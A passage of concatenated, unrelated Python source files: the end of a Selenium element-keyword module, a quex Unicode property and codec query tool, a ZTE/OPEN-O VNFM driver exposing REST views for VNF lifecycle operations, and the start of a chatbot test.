% (actual_xpath_count, xpath))
# Private
def _element_find(self, locator, first_only, required, tag=None):
browser = self._current_browser()
elements = self._element_finder.find(browser, locator, tag)
if required and len(elements) == 0:
raise ValueError("Element locator '" + locator + "' did not match any elements.")
if first_only:
if len(elements) == 0: return None
return elements[0]
return elements
def _frame_contains(self, locator, text):
browser = self._current_browser()
element = self._element_find(locator, True, True)
browser.switch_to_frame(element)
self._info("Searching for text from frame '%s'." % locator)
found = self._is_text_present(text)
browser.switch_to_default_content()
return found
def _get_text(self, locator):
element = self._element_find(locator, True, False)
if element is not None:
return element.text
return None
def _get_value(self, locator, tag=None):
element = self._element_find(locator, True, False, tag=tag)
return element.get_attribute('value') if element is not None else None
def _is_enabled(self, locator):
element = self._element_find(locator, True, True)
if not self._is_form_element(element):
raise AssertionError("ERROR: Element %s is not an input." % (locator))
if not element.is_enabled():
return False
read_only = element.get_attribute('readonly')
if read_only == 'readonly' or read_only == 'true':
return False
return True
def _is_text_present(self, text):
locator = "xpath=//*[contains(., %s)]" % utils.escape_xpath_value(text);
return self._is_element_present(locator)
def _is_visible(self, locator):
element = self._element_find(locator, True, False)
if element is not None:
return element.is_displayed()
return None
def _map_ascii_key_code_to_key(self, key_code):
map = {
0: Keys.NULL,
8: Keys.BACK_SPACE,
9: Keys.TAB,
10: Keys.RETURN,
13: Keys.ENTER,
24: Keys.CANCEL,
27: Keys.ESCAPE,
32: Keys.SPACE,
42: Keys.MULTIPLY,
43: Keys.ADD,
44: Keys.SEPARATOR,
45: Keys.SUBTRACT,
56: Keys.DECIMAL,
57: Keys.DIVIDE,
59: Keys.SEMICOLON,
61: Keys.EQUALS,
127: Keys.DELETE
}
key = map.get(key_code)
if key is None:
key = chr(key_code)
return key
def _parse_attribute_locator(self, attribute_locator):
parts = attribute_locator.rpartition('@')
if len(parts[0]) == 0:
raise ValueError("Attribute locator '%s' does not contain an element locator." % (attribute_locator))
if len(parts[2]) == 0:
raise ValueError("Attribute locator '%s' does not contain an attribute name." % (attribute_locator))
return (parts[0], parts[2])
def _is_element_present(self, locator, tag=None):
return (self._element_find(locator, True, False, tag=tag) != None)
def _page_contains(self, text):
browser = self._current_browser()
browser.switch_to_default_content()
if self._is_text_present(text):
return True
subframes = self._element_find("xpath=//frame|//iframe", False, False)
self._debug('Current frame has %d subframes' % len(subframes))
for frame in subframes:
browser.switch_to_frame(frame)
found_text = self._is_text_present(text)
browser.switch_to_default_content()
if found_text:
return True
return False
def _page_should_contain_element(self, locator, tag, message, loglevel):
element_name = tag if tag is not None else 'element'
if not self._is_element_present(locator, tag):
if not message:
message = "Page should have contained %s '%s' but did not"\
% (element_name, locator)
self.log_source(loglevel)
raise AssertionError(message)
self._info("Current page contains %s '%s'." % (element_name, locator))
def _page_should_not_contain_element(self, locator, tag, message, loglevel):
element_name = tag if tag is not None else 'element'
if self._is_element_present(locator, tag):
if not message:
message = "Page should not have contained %s '%s'"\
% (element_name, locator)
self.log_source(loglevel)
raise AssertionError(message)
self._info("Current page does not contain %s '%s'."
% (element_name, locator))
|
|
import sys
from quex.engine.misc.file_in import error_msg
from quex.engine.utf8 import map_unicode_to_utf8
from quex.engine.interval_handling import NumberSet, Interval
from quex.engine.unicode_db.parser import ucs_property_db
from quex.exception import RegularExpressionException
from quex.input.command_line.GetPot import GetPot
import quex.input.regular_expression.core as regular_expression
import quex.engine.codec_db.core as codec_db
from quex.blackboard import setup as Setup
OPTION_DB = {
"--codec-info": ["Information about supported characters of a codec."],
"--codec-file-info": ["Information about supported characters of a codec file."],
"--codec-for-language": ["Lists possible codecs for a given language."],
"--property": ["Querying properties"],
"--set-by-property": ["Determining character set by property"],
"--set-by-expression": ["Determining character set by property"],
"--property-match": ["Find property values that match wildcards"],
"--numeric": ["Display sets numerically", ["--set-by-property", "--set-by-expression"]],
"--intervals": ["Display sets by intervals", ["--set-by-property", "--set-by-expression"]],
"--names": ["Display unicode names", ["--set-by-property", "--set-by-expression"]],
}
def get_supported_command_line_option_description():
txt = ""
for key, description in OPTION_DB.items():
txt += " " + key
if len(description) >= 2:
txt += " (only with "
txt += repr(description[1])[1:-1]
txt += ")"
txt += "\n"
return txt
def search_and_validate(CL, Option):
if CL.search(Option) == False: return False
# Validate command line
ufos = CL.unidentified_options(OPTION_DB.keys())
if len(ufos) != 0:
error_msg("Unidentified option(s) = " + repr(ufos) + "\n" + \
get_supported_command_line_option_description())
return True
def do(ARGV):
"""Performs a query based on the given command line arguments.
RETURNS: True if a query was performed.
False if not query was requested.
"""
cl = GetPot(ARGV, SectionsEnabledF=False)
success_f = False
# Regular Expressions extract the BufferLimitCode and the PathTerminatorCode
# from the sets. So let us define them outside the normal range.
backup_buffer_limit_code = Setup.buffer_limit_code
backup_path_limit_code = Setup.path_limit_code
Setup.buffer_limit_code = -1
Setup.path_limit_code = -1
try:
success_f = True
if search_and_validate(cl, "--codec-info"): __handle_codec(cl)
elif search_and_validate(cl, "--codec-file-info"): __handle_codec_file(cl)
elif search_and_validate(cl, "--codec-for-language"): __handle_codec_for_language(cl)
elif search_and_validate(cl, "--property"): __handle_property(cl)
elif search_and_validate(cl, "--set-by-property"): __handle_set_by_property(cl)
elif search_and_validate(cl, "--set-by-expression"): __handle_set_by_expression(cl)
elif search_and_validate(cl, "--property-match"): __handle_property_match(cl)
else: success_f = False
except RegularExpressionException, x:
error_msg(x.message)
Setup.buffer_limit_code = backup_buffer_limit_code
Setup.path_limit_code = backup_path_limit_code
return success_f
def __handle_codec(cl):
codec_name = cl.follow("", "--codec-info")
supported_codec_list = codec_db.get_supported_codec_list(IncludeAliasesF=True)
if codec_name == "":
txt = "Missing argument after '--codec-info'. Supported codecs are:\n\n"
line_txt = ""
for name in supported_codec_list:
line_txt += name + ", "
if len(line_txt) > 50: txt += line_txt + "\n"; line_txt = ""
txt += line_txt
txt = txt[:-2] + "."
error_msg(txt)
character_set = codec_db.get_supported_unicode_character_set(CodecAlias=codec_name)
__display_set(character_set, cl)
print
print "Codec is designed for:"
print repr(codec_db.get_supported_language_list(codec_name))[1:-1]
def __handle_codec_file(cl):
file_name = cl.follow("", "--codec-file-info")
character_set = codec_db.get_supported_unicode_character_set(FileName=file_name)
__display_set(character_set, cl)
def __handle_codec_for_language(cl):
language_name = cl.follow("", "--codec-for-language")
supported_language_list = codec_db.get_supported_language_list()
if language_name == "":
txt = "Missing argument after '--codec-for-language'. Supported languages are:\n\n"
line_txt = ""
for name in supported_language_list:
line_txt += name + ", "
if len(line_txt) > 50: txt += line_txt + "\n"; line_txt = ""
txt += line_txt
txt = txt[:-2] + "."
error_msg(txt)
print "Possible Codecs: " + repr(codec_db.get_codecs_for_language(language_name))[1:-1]
def __handle_property(cl):
property_follower = cl.follow("", "--property")
if property_follower == "":
# no specific property => display all properties in the database
sys.stderr.write("(please, wait for database parsing to complete)\n")
ucs_property_db.init_db()
print ucs_property_db.get_property_descriptions()
else:
# specific property => display information about it
sys.stderr.write("(please, wait for database parsing to complete)\n")
property = __get_property(property_follower)
if property is None: return True
print property
def __handle_property_match(cl):
property_follower = cl.follow("", "--property-match")
sys.stderr.write("(please, wait for database parsing to complete)\n")
if property_follower == "":
return
fields = map(lambda x: x.strip(), property_follower.split("="))
if len(fields) != 2:
error_msg("Wrong property setting '%s'." % property_follower)
# -- determine name and value
name = fields[0]
wild_card_expression = fields[1]
# -- get the property from the database
property = __get_property(name)
if property is None:
return True
# -- find the character set for the given expression
if property.type == "Binary":
error_msg("Binary property '%s' is not subject to value wild card matching.\n" % property.name)
for value in property.get_wildcard_value_matches(wild_card_expression):
print value
def __handle_set_by_property(cl):
result = cl.follow("", "--set-by-property")
# expect: 'property-name = value'
if result != "":
sys.stderr.write("(please, wait for database parsing to complete)\n")
fields = map(lambda x: x.strip(), result.split("="))
if len(fields) not in [1, 2]:
error_msg("Wrong property setting '%s'." % result)
# -- determine name and value
name = fields[0]
if len(fields) == 2: value = fields[1]
else: value = None
# -- get the property from the database
property = __get_property(name)
if property is None:
return True
# -- find the character set for the given expression
if property.type == "Binary" and value is not None:
error_msg("Binary property '%s' cannot have a value assigned to it.\n" % property.name + \
"Setting ignored. Printing set of characters with the given property.")
character_set = property.get_character_set(value)
if character_set.__class__.__name__ != "NumberSet":
error_msg(character_set)
__display_set(character_set, cl)
def __handle_set_by_expression(cl):
result = cl.follow("", "--set-by-expression")
if result != "":
character_set = regular_expression.parse_character_set("[:" + result + ":]")
__display_set(character_set, cl)
def __display_set(CharSet, cl):
if cl.search("--numeric"): display = "hex"
else: display = "utf8"
CharSet.intersect_with(NumberSet(Interval(0, 0x110000)))
print "Characters:\n",
if cl.search("--intervals"):
__print_set_in_intervals(CharSet, display, 80)
elif cl.search("--names"):
__print_set_character_names(CharSet, display, 80)
else:
__print_set_single_characters(CharSet, display, 80)
print
def __get_property(Name_or_Alias):
ucs_property_db.init_db()
property = ucs_property_db[Name_or_Alias]
if property.__class__.__name__ != "PropertyInfo":
print property
if Name_or_Alias.find("=") != -1:
print "Use command line option `--set-by-property` to investigate property settings."
if Name_or_Alias.find("(") != -1:
print "Use command line option `--set-by-expression` to investigate character set operations."
return None
property.init_code_point_db()
return property
def __print_set_in_intervals(CharSet, Display, ScreenWidth):
assert Display in ["hex", "utf8"]
interval_list = CharSet.get_intervals(PromiseToTreatWellF=True)
txt = ""
line_size = 0
for interval in interval_list:
interval_string = interval.get_string(Display, "-") + ", "
interval_string_length = len(interval_string)
if line_size + interval_string_length > ScreenWidth:
txt += "\n"
line_size = 0
else:
line_size += interval_string_length
txt += interval_string
print txt
def __print_set_character_names(CharSet, Display, ScreenWidth):
for interval in CharSet.get_intervals(PromiseToTreatWellF=True):
for code_point in range(interval.begin, interval.end):
print "%06X: %s" % (code_point, ucs_property_db.map_code_point_to_character_name(code_point))
class CharacterList:
def __init__(self, CharacterSet):
interval_list = CharacterSet.get_intervals(PromiseToTreatWellF=True)
interval_list.sort(lambda x, y: cmp(x.begin, y.begin))
self.__interval_list = interval_list
self.__interval_list_size = len(interval_list)
if self.__interval_list_size == 0:
self.__current_character = None
self.__current_interval_i = -1
else:
# No character below 0 --> take first interval with .end > 0
for i in range(self.__interval_list_size):
if self.__interval_list[i].end >= 0: break
self.__current_character = max(0, self.__interval_list[i].begin)
self.__current_interval_i = i
def is_empty(self):
return self.__interval_list_size == 0
def next(self):
tmp = self.__current_character
if tmp is None: return None
# Prepare the character for the next call
self.__current_character += 1
if self.__current_character == self.__interval_list[self.__current_interval_i].end:
self.__current_interval_i += 1
if self.__current_interval_i == self.__interval_list_size:
self.__current_character = None # End reached
else:
self.__current_character = self.__interval_list[self.__current_interval_i].begin
# Return the character that is still now to treat
return tmp
def __print_set_single_characters(CharSet, Display, ScreenWidth):
assert Display in ["hex", "utf8"]
if Display == "hex":
CharactersPerLine = 8
ColumnWidth = 6
else:
CharactersPerLine = 32
ColumnWidth = 2
# just to make sure ...
character_list = CharacterList(CharSet)
if character_list.is_empty():
sys.stdout.write("<Result = Empty Character Set>\n")
return
# Avoid memory overflow for very large sets: get character by character
last_start_character_of_line = -1
last_horizontal_offset = 0
while 1 + 1 == 2:
character_code = character_list.next()
if character_code is None: break
start_character_of_line = character_code - character_code % CharactersPerLine
horizontal_offset = character_code - start_character_of_line
if start_character_of_line > last_start_character_of_line + CharactersPerLine:
sys.stdout.write("\n...")
if start_character_of_line != last_start_character_of_line:
sys.stdout.write("\n%05X: " % start_character_of_line)
last_horizontal_offset = 0
sys.stdout.write(" " * ColumnWidth * (horizontal_offset - last_horizontal_offset - 1))
if Display == "hex":
sys.stdout.write("%05X " % character_code)
else:
if character_code >= 0x20:
sys.stdout.write("%s " % map_unicode_to_utf8(character_code))
else:
sys.stdout.write("? ")
last_start_character_of_line = start_character_of_line
last_horizontal_offset = horizontal_offset
|
|
# Copyright 2017 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import logging
import time
import traceback
from rest_framework.decorators import api_view
from rest_framework.response import Response
from driver.pub.utils import restcall
from driver.pub.utils.restcall import req_by_msb
from rest_framework import status
# ==================================================
vnf_create_url = "openoapi/vnflcm/v1/vnf_instances"
vnf_inst_url = "openoapi/vnflcm/v1/vnf_instances/%s/instantiate"
vnf_delete_url = "openoapi/vnflcm/v1/vnf_instances/%s"
vnf_terminate_url = "openoapi/vnflcm/v1/vnf_instances/%s/terminate"
operation_status_url = "openoapi/vnflcm/v1/vnf_lc_ops/%s?responseId=%s"
vnf_detail_url = "openoapi/vnflcm/v1/vnf_instances/%s"
EXTSYS_GET_VNFM = "openoapi/extsys/v1/vnfms/%s"
vnf_query_url = "openoapi/vnflcm/v1/vnf_instances/%s"
notify_url = 'openoapi/nslcm/v1/ns/{vnfmid}/vnfs/{vnfInstanceId}/Notify'
query_vnf_resp_mapping = {
"vnfInstanceId": "",
"vnfInstanceName": "",
"vnfInstanceDescription": "",
"vnfdId": "",
"vnfPackageId":"",
"version":"",
"vnfProvider":"",
"vnfType":"",
"vnfStatus":""
}
logger = logging.getLogger(__name__)
def mapping_conv(keyword_map, rest_return):
resp_data = {}
for param in keyword_map:
if keyword_map[param]:
if isinstance(keyword_map[param], dict):
resp_data[param] = mapping_conv(keyword_map[param], ignorcase_get(rest_return, param))
else:
resp_data[param] = ignorcase_get(rest_return, param)
return resp_data
def fun_name():
return "=================%s==================" % inspect.stack()[1][3]
def ignorcase_get(args, key):
if not key:
return ""
if not args:
return ""
if key in args:
return args[key]
for old_key in args:
if old_key.upper() == key.upper():
return args[old_key]
return ""
def set_createvnf_params(data):
input_data = {}
input_data["vnfdId"] = ignorcase_get(data,"vnfDescriptorId")
input_data["vnfInstanceName"] = ignorcase_get(data, "vnfInstanceName")
input_data["vnfInstanceDescription"] = ignorcase_get(data, "vnfInstanceDescription")
return input_data
def set_instantvnf_params(data):
input_data = {}
input_data["flavourId"] = ignorcase_get(data, "flavourId")
input_data["extVirtualLinks"] = ignorcase_get(data, "extVirtualLink")
input_data["additionalParams"] = ignorcase_get(data,"additionalParam")
input_data["flavourId"] = ignorcase_get(data,"flavourId")
return input_data
def set_terminatevnf_params(data):
input_data = {}
input_data["terminationType"] = ignorcase_get(data,"terminationType")
input_data["gracefulTerminationTimeout"] = ignorcase_get(data,"gracefulTerminationTimeout")
return input_data
def set_deletevnf_params(data):
pass
def get_inst_levelId(vnfdId):
inst_levelId = 0
return inst_levelId
def get_vnfm_info(vnfm_id):
ret = req_by_msb((EXTSYS_GET_VNFM) % vnfm_id, "GET")
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
vnfm_info = json.JSONDecoder().decode(ret[1])
logger.debug("[%s] vnfm_info=%s", fun_name(), vnfm_info)
return 0, vnfm_info
# Query VNFM by VNFMID
def vnfm_get(vnfmid):
ret = req_by_msb("openoapi/extsys/v1/vnfms/%s" % vnfmid, "GET")
return ret
def call_vnfm_rest(vnfm_info, input_data, res_url, call_method = "post"):
ret = restcall.call_req(
base_url=ignorcase_get(vnfm_info, "url"),
user=ignorcase_get(vnfm_info, "userName"),
passwd=ignorcase_get(vnfm_info, "password"),
auth_type=restcall.rest_no_auth,
resource=res_url,
method=call_method,
content=json.JSONEncoder().encode(input_data))
return ret
def call_vnfm_createvnf(vnfm_info, input_data):
return call_vnfm_rest(vnfm_info, input_data, vnf_create_url)
def call_vnfm_instvnf(vnfm_info, input_data, vnfInstanceId):
return call_vnfm_rest(vnfm_info, input_data, vnf_inst_url % vnfInstanceId, "post")
def call_vnfm_terminatevnf(vnfm_info, input_data, vnfInstanceId):
return call_vnfm_rest(vnfm_info, input_data, vnf_terminate_url % vnfInstanceId, "post")
def call_vnfm_deletevnf(vnfm_info, vnfInstanceId):
return call_vnfm_rest(vnfm_info, None, vnf_delete_url % vnfInstanceId, "delete")
def call_vnfm_queryvnf(vnfm_info,vnfInstanceId):
return call_vnfm_rest(vnfm_info, None, vnf_query_url % vnfInstanceId, "get")
def call_vnfm_operation_status(vnfm_info, jobId, responseId = None):
return call_vnfm_rest(vnfm_info, None, operation_status_url % (jobId, responseId), "get")
"""
def wait4job(vnfm_id,jobId,gracefulTerminationTimeout):
begin_time = time.time()
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return 255, Response(data={"error":"Fail to get VNFM!"}, status=status.HTTP_412_PRECONDITION_FAILED)
responseId = None
while ret == 0:
cur_time = time.time()
if gracefulTerminationTimeout and (cur_time - begin_time > gracefulTerminationTimeout):
return 255, Response(data={"error":"Fail to terminate VNF!"}, status=status.HTTP_408_REQUEST_TIMEOUT)
ret = call_vnfm_operation_status(vnfm_info,jobId,responseId)
if ret[0] != 0:
return 255, Response(data={"error":"Fail to get job status!"}, status=status.HTTP_412_PRECONDITION_FAILED)
if json.JSONDecoder().decode(ret[2]) != 200:
return 255, Response(data={"error":"Fail to get job status!"}, status=status.HTTP_412_PRECONDITION_FAILED)
job_info = json.JSONDecoder().decode(ret[1])
logger.info('job_info=%s' % job_info)
responseId = ignorcase_get(ignorcase_get(job_info, "responseDescriptor"), "responseId")
progress = ignorcase_get(ignorcase_get(job_info, "responseDescriptor"), "progress")
if progress == "100":
return 0, Response(data={"success":"success"}, status=status.HTTP_204_NO_CONTENT)
except Exception as e:
logger.error("Error occurred when do_createvnf")
return 255, Response(data={"error":"Exception caught! Fail to get job status!"}, status=status.HTTP_412_PRECONDITION_FAILED)
"""
def wait4job(vnfm_id, job_id, gracefulTerminationTimeout=1200, retry_count=60, interval_second=3):
count = 0
response_id, new_response_id = 0, 0
job_end_normal, job_timeout = False, True
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return 255, Response(data={"error":"Fail to get VNFM!"}, status=status.HTTP_412_PRECONDITION_FAILED)
while count < retry_count:
count = count + 1
time.sleep(interval_second)
#ret = req_by_msb("/openoapi/vnflcm/v1/vnf_lc_ops/%s?responseId=%s" % (job_id, response_id), "GET")
ret = call_vnfm_operation_status(vnfm_info, job_id, response_id)
if ret[0] != 0:
logger.error("Failed to query job: %s:%s", ret[2], ret[1])
continue
job_result = json.JSONDecoder().decode(ret[1])
if "responseDescriptor" not in job_result:
logger.error("Job(%s) does not exist.", job_id)
continue
progress = job_result["responseDescriptor"]["progress"]
new_response_id = job_result["responseDescriptor"]["responseId"]
job_desc = job_result["responseDescriptor"]["statusDescription"]
if new_response_id != response_id:
logger.debug("%s:%s:%s", progress, new_response_id, job_desc)
response_id = new_response_id
count = 0
if progress == 255:
job_timeout = False
logger.error("Job(%s) failed: %s", job_id, job_desc)
break
elif progress == 100:
job_end_normal, job_timeout = True, False
logger.info("Job(%s) ended normally", job_id)
return 0, Response(data={"success":"success"}, status=status.HTTP_204_NO_CONTENT)
break
if job_timeout:
logger.error("Job(%s) timeout", job_id)
return 255, Response(data={"error":"Fail to get job status!"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def do_createvnf(request, data, vnfm_id):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_createvnf(vnfm_info, data)
logger.debug("[%s] call_req ret=%s", fun_name(), ret)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
except Exception as e:
logger.error("Error occurred when do_createvnf")
raise e
return 0, resp
def do_instvnf(vnfInstanceId, request, data, vnfm_id):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_instvnf(vnfm_info,data, vnfInstanceId)
logger.debug("[%s] call_req ret=%s", fun_name(), ret)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
except Exception as e:
logger.error("Error occurred when do_instvnf")
raise e
return 0, resp
def do_terminatevnf(request, data, vnfm_id, vnfInstanceId):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret,vnfm_info
ret = call_vnfm_terminatevnf(vnfm_info, data, vnfInstanceId)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp_data = json.JSONDecoder().decode(ret[1])
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when do_terminatevnf")
raise e
return 0, resp_data
def do_deletevnf(request, vnfm_id, vnfInstanceId):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
input_data = set_deletevnf_params(request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_deletevnf(vnfm_info, vnfInstanceId)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
except Exception as e:
logger.error("Error occurred when do_deletevnf")
raise e
return 0, {}
def do_queryvnf(request, vnfm_id, vnfInstanceId):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_queryvnf(vnfm_info, vnfInstanceId)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp_data = json.JSONDecoder().decode(ret[1])
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when do_query vnf")
raise e
return 0, resp_data
@api_view(http_method_names=['POST'])
def instantiate_vnf(request, *args, **kwargs):
try:
input_data = set_createvnf_params(request.data)
vnfm_id = ignorcase_get(kwargs, "vnfmid")
ret, resp = do_createvnf(request, input_data, vnfm_id)
if ret != 0:
return resp
logger.info("[%s]resp_data=%s", fun_name(), resp)
vnfInstanceId = resp["vnfInstanceId"]
logger.info("[%s]vnfInstanceId=%s", fun_name(), vnfInstanceId)
input_data = set_instantvnf_params(request.data)
input_data["vnfmId"] = vnfm_id
ret, resp = do_instvnf(vnfInstanceId, request, input_data, vnfm_id)
if ret != 0:
return resp
resp_data = {"jobId":"", "vnfInstanceId":""}
resp_data["vnfInstanceId"] = vnfInstanceId
resp_data["jobId"] = resp["jobId"]
except Exception as e:
logger.error("Error occurred when instantiating VNF")
raise e
return Response(data=resp_data, status=status.HTTP_201_CREATED)
@api_view(http_method_names=['POST'])
def terminate_vnf(request, *args, **kwargs):
vnfm_id = ignorcase_get(kwargs, "vnfmid")
vnfInstanceId = ignorcase_get(kwargs, "vnfInstanceId")
try:
input_data = set_terminatevnf_params(request.data)
ret, resp = do_terminatevnf(request, input_data, vnfm_id, vnfInstanceId)
if ret != 0:
return resp
jobId = ignorcase_get(resp, "jobId")
gracefulTerminationTimeout = ignorcase_get(request.data, "gracefulTerminationTimeout")
ret, response = wait4job(vnfm_id,jobId,gracefulTerminationTimeout)
if ret != 0:
return response
ret, resp = do_deletevnf(request, vnfm_id, vnfInstanceId)
if ret != 0:
return resp
except Exception as e:
logger.error("Error occurred when terminating VNF")
logger.error(traceback.format_exc())
return Response(data={'error': 'Failed to terminate Vnfs'},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return Response(data=resp, status=status.HTTP_204_NO_CONTENT)
"""
@api_view(http_method_names=['POST'])
def terminate_vnf(request, *args, **kwargs):
try:
logger.debug("[%s] request.data=%s", fun_name(), request.data)
vnfm_id = ignorcase_get(kwargs, "vnfmid")
ret = vnfm_get(vnfm_id)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
vnfm_info = json.JSONDecoder().decode(ret[1])
logger.debug("[%s] vnfm_info=%s", fun_name(), vnfm_info)
data = {}
logger.debug("[%s]req_data=%s", fun_name(), data)
ret = restcall.call_req(
base_url=ignorcase_get(vnfm_info, "url"),
user=ignorcase_get(vnfm_info, "userName"),
passwd=ignorcase_get(vnfm_info, "password"),
auth_type=restcall.rest_no_auth,
resource=vnf_delete_url % (ignorcase_get(kwargs, "vnfInstanceID")),
method='delete',
content=json.JSONEncoder().encode(data))
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
resp_data = mapping_conv(vnf_delete_resp_mapping, resp)
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when terminating VNF")
logger.error(traceback.format_exc())
return Response(data={'error': 'Failed to terminate Vnfs'},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return Response(data=resp_data, status=ret[2])
"""
@api_view(http_method_names=['GET'])
def query_vnf(request, *args, **kwargs):
vnfm_id = ignorcase_get(kwargs, "vnfmid")
vnfInstanceId = ignorcase_get(kwargs, "vnfInstanceId")
try:
logger.debug("[%s] request.data=%s", fun_name(), request.data)
ret, resp = do_queryvnf(request, vnfm_id, vnfInstanceId)
if ret != 0:
return resp
resp_response_data = mapping_conv(query_vnf_resp_mapping, ignorcase_get(resp, "ResponseInfo"))
resp_data = {
"vnfInfo":resp_response_data
}
#Handle vnfSoftwareVersion and vnfStatus specially
resp_data["vnfInfo"]["version"] = ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "vnfSoftwareVersion")
if ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "instantiationState"):
if ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "instantiationState") == "INSTANTIATED":
resp_data["vnfInfo"]["vnfStatus"] = "ACTIVE"
if ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "vnfInstanceId"):
resp_data["vnfInfo"]["vnfInstanceId"] = ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "vnfInstanceId")
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when querying VNF information.")
raise e
return Response(data=resp_data, status=status.HTTP_200_OK)
# ==================================================
@api_view(http_method_names=['GET'])
def operation_status(request, *args, **kwargs):
data = {}
try:
logger.debug("[%s] request.data=%s", fun_name(), request.data)
vnfm_id = ignorcase_get(kwargs, "vnfmid")
jobId = ignorcase_get(kwargs, "jobId")
responseId = ignorcase_get(kwargs, "responseId")
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return Response(data={'error': ret[1]}, status=ret[2])
logger.debug("[%s] vnfm_info=%s", fun_name(), vnfm_info)
ret = call_vnfm_operation_status(vnfm_info, jobId, responseId)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
resp_data = json.JSONDecoder().decode(ret[1])
logger.info("[%s]resp_data=%s", fun_name(), resp_data)
'''
ResponseInfo = ignorcase_get(resp_data, "ResponseInfo")
operation_data = {}
operation_data["jobId"] = ignorcase_get(ResponseInfo, "vnfLcOpId")
operation_data["responseDescriptor"] = {}
operation_data["responseDescriptor"]["status"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"lcmOperationStatus")
operation_data["responseDescriptor"]["progress"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"progress")
operation_data["responseDescriptor"]["statusDescription"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"statusDescription")
operation_data["responseDescriptor"]["errorCode"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"errorCode")
operation_data["responseDescriptor"]["responseId"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"responseId")
operation_data["responseDescriptor"]["responseHistoryList"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"responseHistoryList")
'''
except Exception as e:
logger.error("Error occurred when getting operation status information.")
raise e
return Response(data=resp_data, status=status.HTTP_200_OK)
# ==================================================
grant_vnf_url = 'openoapi/nslcm/v1/ns/grantvnf'
@api_view(http_method_names=['PUT'])
def grantvnf(request, *args, **kwargs):
logger.info("=====grantvnf=====")
try:
resp_data = {}
logger.info("req_data = %s", request.data)
ret = req_by_msb(grant_vnf_url, "POST", content=json.JSONEncoder().encode(request.data))
logger.info("ret = %s", ret)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
resp_data['vimid'] = ignorcase_get(resp['vim'], 'vimid')
resp_data['tenant'] = ignorcase_get(ignorcase_get(resp['vim'], 'accessinfo'), 'tenant')
logger.info("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred in Grant VNF.")
raise e
return Response(data=resp_data, status=ret[2])
# ==================================================
@api_view(http_method_names=['POST'])
def notify(request, *args, **kwargs):
try:
logger.info("[%s]req_data = %s", fun_name(), request.data)
ret = req_by_msb(notify_url.format(vnfmid=ignorcase_get(request.data, 'VNFMID'),
vnfInstanceId=ignorcase_get(request.data, 'vnfinstanceid')),
"POST", content=json.JSONEncoder().encode(request.data))
logger.info("[%s]data = %s", fun_name(), ret)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
except Exception as e:
logger.error("Error occurred in LCM notification.")
raise e
return Response(data=None, status=ret[2])
@api_view(http_method_names=['GET'])
def get_vnfpkgs(request, *args, **kwargs):
logger.info("Enter %s", fun_name())
ret = req_by_msb("openoapi/nslcm/v1/vnfpackage", "GET")
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
resp = json.JSONDecoder().decode(ret[1])
return Response(data=resp, status=status.HTTP_200_OK)
|
|
import json
import pytest
import workstreambot.scrum.dictionary as dict
from workstreambot.message_handler import MessageHandler
def test_guide_endless():
handler = MessageHandler({"scrum"})
